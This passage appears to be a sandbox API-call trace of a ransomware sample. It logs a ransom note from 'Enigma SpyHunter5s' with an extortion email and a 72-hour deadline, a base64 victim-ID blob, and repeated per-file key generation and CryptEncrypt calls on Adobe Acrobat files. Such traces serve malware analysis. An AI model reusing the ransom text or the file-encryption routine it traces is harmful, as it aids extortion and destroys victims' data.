dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.891] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.892] WriteFile (in: hFile=0xa0, lpBuffer=0x248e28f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3b8, lpOverlapped=0x0 | out: lpBuffer=0x248e28f*, lpNumberOfBytesWritten=0x248e3b8*=0x127, lpOverlapped=0x0) returned 1 [0179.892] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.892] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3b8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3b8*=0x2ac, lpOverlapped=0x0) returned 1 [0179.893] CloseHandle (hObject=0xa0) returned 1 [0179.894] GetProcessHeap () returned 0x2c0000 [0179.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b028 | out: hHeap=0x2c0000) returned 1 [0179.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.895] GetProcessHeap () returned 0x2c0000 [0179.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73cf8 | out: hHeap=0x2c0000) returned 1 [0179.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e350 | out: pbBuffer=0x248e350) returned 1 [0179.895] GetProcessHeap () returned 0x2c0000 [0179.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e348*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e348*=0x30) returned 1 [0179.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.897] GetProcessHeap () returned 0x2c0000 [0179.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.897] GetProcessHeap () returned 0x2c0000 [0179.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e667a0 | out: hHeap=0x2c0000) returned 1 [0179.897] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e350 | out: pbBuffer=0x248e350) returned 1 [0179.897] GetProcessHeap () returned 0x2c0000 [0179.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e348*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e348*=0x30) returned 1 [0179.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.900] GetProcessHeap () returned 0x2c0000 [0179.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.901] GetProcessHeap () returned 0x2c0000 [0179.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e666c0 | out: hHeap=0x2c0000) returned 1 [0179.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e348 | out: pbBuffer=0x248e348) returned 1 [0179.901] GetProcessHeap () returned 0x2c0000 [0179.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e340*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e340*=0x30) returned 1 [0179.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.906] GetProcessHeap () returned 0x2c0000 [0179.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.906] GetProcessHeap () returned 0x2c0000 [0179.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e665e0 | out: hHeap=0x2c0000) returned 1 [0179.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e348 | out: pbBuffer=0x248e348) returned 1 [0179.906] GetProcessHeap () returned 0x2c0000 [0179.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e340*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e340*=0x30) returned 1 [0179.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.909] GetProcessHeap () returned 0x2c0000 [0179.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.909] GetProcessHeap () returned 0x2c0000 [0179.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66500 | out: hHeap=0x2c0000) returned 1 [0179.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e340 | out: pbBuffer=0x248e340) returned 1 [0179.909] GetProcessHeap () returned 0x2c0000 [0179.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e338*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e338*=0x30) returned 1 [0179.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.910] GetProcessHeap () returned 0x2c0000 [0179.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.911] GetProcessHeap () returned 0x2c0000 [0179.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66420 | out: hHeap=0x2c0000) returned 1 [0179.911] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e340 | out: pbBuffer=0x248e340) returned 1 [0179.911] GetProcessHeap () returned 0x2c0000 [0179.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.911] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e338*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e338*=0x30) returned 1 [0179.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.913] GetProcessHeap () returned 0x2c0000 [0179.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.913] GetProcessHeap () returned 0x2c0000 [0179.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66340 | out: hHeap=0x2c0000) returned 1 [0179.913] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e338 | out: pbBuffer=0x248e338) returned 1 [0179.913] GetProcessHeap () returned 0x2c0000 [0179.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.913] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e330*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e330*=0x30) returned 1 [0179.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.916] GetProcessHeap () returned 0x2c0000 [0179.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.916] GetProcessHeap () returned 0x2c0000 [0179.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66260 | out: hHeap=0x2c0000) returned 1 [0179.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e338 | out: pbBuffer=0x248e338) returned 1 [0179.916] GetProcessHeap () returned 0x2c0000 [0179.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e330*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e330*=0x30) returned 1 [0179.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.919] GetProcessHeap () returned 0x2c0000 [0179.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.919] GetProcessHeap () returned 0x2c0000 [0179.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66180 | out: hHeap=0x2c0000) returned 1 [0179.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e330 | out: pbBuffer=0x248e330) returned 1 [0179.919] GetProcessHeap () returned 0x2c0000 [0179.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e328*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e328*=0x30) returned 1 [0179.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.920] GetProcessHeap () returned 0x2c0000 [0179.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.920] GetProcessHeap () returned 0x2c0000 [0179.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e660a0 | out: hHeap=0x2c0000) returned 1 [0179.920] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e330 | out: pbBuffer=0x248e330) returned 1 [0179.920] GetProcessHeap () returned 0x2c0000 [0179.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e328*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e328*=0x30) returned 1 [0179.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.923] GetProcessHeap () returned 0x2c0000 [0179.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.923] GetProcessHeap () returned 0x2c0000 [0179.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65fc0 | out: hHeap=0x2c0000) returned 1 [0179.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e328 | out: pbBuffer=0x248e328) returned 1 [0179.923] GetProcessHeap () returned 0x2c0000 [0179.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e320*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e320*=0x30) returned 1 [0179.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.925] GetProcessHeap () returned 0x2c0000 [0179.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.925] GetProcessHeap () returned 0x2c0000 [0179.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65ee0 | out: hHeap=0x2c0000) returned 1 [0179.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e328 | out: pbBuffer=0x248e328) returned 1 [0179.925] GetProcessHeap () returned 0x2c0000 [0179.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e320*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e320*=0x30) returned 1 [0179.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.929] GetProcessHeap () returned 0x2c0000 [0179.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.929] GetProcessHeap () returned 0x2c0000 [0179.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65e00 | out: hHeap=0x2c0000) returned 1 [0179.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e320 | out: pbBuffer=0x248e320) returned 1 [0179.929] GetProcessHeap () returned 0x2c0000 [0179.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e318*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e318*=0x30) returned 1 [0179.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.931] GetProcessHeap () returned 0x2c0000 [0179.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.931] GetProcessHeap () returned 0x2c0000 [0179.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65d20 | out: hHeap=0x2c0000) returned 1 [0179.931] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e320 | out: pbBuffer=0x248e320) returned 1 [0179.931] GetProcessHeap () returned 0x2c0000 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e318*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e318*=0x30) returned 1 [0179.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.970] GetProcessHeap () returned 0x2c0000 [0179.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.970] GetProcessHeap () returned 0x2c0000 [0179.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e65c40 | out: hHeap=0x2c0000) returned 1 [0179.970] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e318 | out: pbBuffer=0x248e318) returned 1 [0179.970] GetProcessHeap () returned 0x2c0000 [0179.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e310*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e310*=0x30) returned 1 [0179.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.978] GetProcessHeap () returned 0x2c0000 [0179.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.978] GetProcessHeap () returned 0x2c0000 [0179.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64d60 | out: hHeap=0x2c0000) returned 1 [0179.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e318 | out: pbBuffer=0x248e318) returned 1 [0179.978] GetProcessHeap () returned 0x2c0000 [0179.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e310*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e310*=0x30) returned 1 [0179.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.981] GetProcessHeap () returned 0x2c0000 [0179.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.981] GetProcessHeap () returned 0x2c0000 [0179.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64900 | out: hHeap=0x2c0000) returned 1 [0179.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e310 | out: pbBuffer=0x248e310) returned 1 [0179.981] GetProcessHeap () returned 0x2c0000 [0179.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e308*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e308*=0x30) returned 1 [0179.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.982] GetProcessHeap () returned 0x2c0000 [0179.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.982] GetProcessHeap () returned 0x2c0000 [0179.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64580 | out: hHeap=0x2c0000) returned 1 [0179.982] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e310 | out: pbBuffer=0x248e310) returned 1 [0179.982] GetProcessHeap () returned 0x2c0000 [0179.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.982] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e308*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e308*=0x30) returned 1 [0179.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.985] GetProcessHeap () returned 0x2c0000 [0179.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.985] GetProcessHeap () returned 0x2c0000 [0179.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e644a0 | out: hHeap=0x2c0000) returned 1 [0179.986] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e308 | out: pbBuffer=0x248e308) returned 1 [0179.986] GetProcessHeap () returned 0x2c0000 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.986] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e300*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e300*=0x30) returned 1 [0179.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.986] GetProcessHeap () returned 0x2c0000 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.986] GetProcessHeap () returned 0x2c0000 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64120 | out: hHeap=0x2c0000) returned 1 [0179.986] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e308 | out: pbBuffer=0x248e308) returned 1 [0179.986] GetProcessHeap () returned 0x2c0000 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.986] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e300*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e300*=0x30) returned 1 [0179.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files 